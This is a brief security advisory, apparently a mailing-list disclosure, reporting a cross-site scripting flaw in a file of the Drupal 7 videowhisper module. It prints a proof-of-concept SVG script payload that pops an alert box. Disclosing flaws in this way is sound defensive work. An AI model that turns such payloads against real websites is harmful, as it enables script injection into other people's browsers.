Hello,
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.
Vendor Notification: 22, Oct 2014
Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
The content of xss.txt:
<root>
<script xmlns="http://www.w3.org/2000/svg"><![CDATA[
alert('XSS');
]]></script>
</root>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.
Best regards